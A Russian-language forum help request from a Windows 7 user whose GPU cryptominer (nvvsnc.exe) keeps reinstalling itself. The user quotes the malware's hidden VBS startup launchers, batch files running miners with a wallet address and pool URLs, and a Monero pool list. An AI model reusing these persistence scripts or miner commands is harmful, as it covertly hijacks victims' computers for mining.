Вложений: 2
nvvsnc.exe - "miner" вернулся...
Windows 7 x64
_____________
BitCoinMiner который уже не первый раз удалял с компьютера снова вернулся.
При попытке удалить его, вместе со всеми файлами которые к нему привязаны, всё возвращается после перезагрузки компьютера.
Сам процесс nvvsnc.exe процессор не грузит, но при этом система охлаждения работает достаточно "громко" - другими словами, он загружает видеокарту.
Файлы:
C:\Windows\SysWOW64\
-nvvsnc.exe
-nvvsnc.bat
-Start.vbs
-Start.bat
-Star.bat
-listm.txt
-pools.txt
-run.exe
-Update_2.exe
-Update_3.exe
-Update_5.exe
-Update_7.exe
-Update_35.exe
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\
-Start.vbs
Текст в файлах:
-Start.vbs (C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\)
[CODE]Set oShell = Wscript.CreateObject("WScript.Shell")CommandLine = "%COMSPEC% /c c:\Windows\SysWOW64\nvvsnc.bat"
oShell.Run CommandLine, 0, 0
REM Update Gpu[/CODE]
(C:\Windows\SysWOW64\)
[CODE]Set oShell = Wscript.CreateObject("WScript.Shell")CommandLine = "%COMSPEC% /c c:\Windows\SysWOW64\Start.bat"
oShell.Run CommandLine, 0, 0[/CODE]
-Start.bat
[CODE]c:\Windows\SysWOW64\nvdrive.exe -dbg -1 -lowcpu 2 -u 49ZuQzYVYBr6yy6hPiHPYa5i7iJN9nJMvKBDZs5b4VSR7R5w8mwr3ssdbMupL1bpaXaEXHwvFsXvNjTAL4pCCWZhE2iaA9K -p x[/CODE]
-Star.bat
[CODE]echo offdel C:\Windows\System32\nvvsnc.vbs
del C:\Windows\SysWOW64\nvvsnc.vbs
end[/CODE]
-nvvsnc.bat
[CODE]c:\windows\syswow64\nvvsnc.exe -a x11 -i 12 -o stratum+tcp://europe1.darkcoin.miningpoolhub.com:20465 -u nimb1982.3 -p x [/CODE]
-listm.txt
[CODE]письмо AGPU[/CODE]
-pools.txt
[CODE]stratum+tcp://xmr.hashinvest.net:5555stratum+tcp://mine.moneropool.org:80
stratum+tcp://mine.cryptoescrow.eu:3333
stratum+tcp://monero.crypto-pool.fr:3333
stratum+tcp://mine.moneropool.com.br:3333
stratum+tcp://xmr.cryptograben.com:7777[/CODE]
Единственное к чему могу всё это привязать, так это utorrent - за долгое время, вчера первый раз включил и вся эта гадость поползла (в данный момент программу удалил).